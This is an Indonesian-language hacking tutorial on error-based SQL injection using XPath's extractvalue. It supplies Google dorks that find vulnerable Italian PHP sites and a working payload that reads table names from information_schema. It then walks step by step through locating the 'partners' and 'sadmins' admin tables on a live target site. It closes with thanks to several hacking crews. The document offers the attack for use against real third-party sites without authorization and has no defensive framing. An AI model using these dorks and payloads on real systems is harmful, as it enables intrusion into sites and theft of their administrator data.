Tutorial SQLI to Xpath (bug partners/sadmins

Tutorial SQLI to Xpath bug (partners/sadmins)

Oleh LazyGans

Assalamualaikum hallo gan balik lagi sama gua kali ini gua bakal kasih tutorial SQLI to Xpath (bug partners/sadmins) siapkan bahan bahan nya

-Dork/Chall

-payload

Di sini gua make live target ya buat live target nya Klik Gw

Dork:

inurl:camere-dettaglio.php?id= site:.it inurl:restaurant-news-detail.php?id= site:.it inurl:rooms-suites.php?id= site:.it inurl:room.php?id= site:.it inurl:rooms-suites.php?id= site:.it 

(Kembangin lagi)

Payload:

'+and extractvalue(0x0a,concat(0x0a,nick kalian dengan hex code,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+-

Nick yang sudah kalian ubah jadi hex code tambahin 0x di depan nya ya 

Oke gas langsung ke target

Oke langsung aja lanjut kasih tanda ' di belakang parameter

Berhubung web nya vuln, langsung kita kasih payload nya ya 

Contoh Klik Gw

Nah.. Tugas kita mencari partners dan sadmins nya ya? 

Lanjut

Kita tambahin 1.1 di belakang payload. 

Contoh Klik Gw

Nah, diangka 1.1 partners nya belum ketemu

Kita tambahin aja terus sampai ada tulisan partners

2.1

3.1

4.1

Dan seterusnya

Nah, diangka 10.1 partners nya ketemu

Next kita mencari sadmins nya. 

Sama caranya dengan mencari partner ya

Tambahin 11.1-12.1 dan seterusnya sampai sadmins selesai

Dan Done!!!!! 

sadmins ada di angka 13.1

Hasil Klik Gw

Nah oke segitu aja tutor dari gw semoga bermanfaat sekian dan terimakasih

Thanks To:

-All Member Indonesia Cyber Nightmare

-Black Brotherhood

-SevenGhost666

-Eagle Xploiter

-Doraemon Cyber Team

#Happy Learn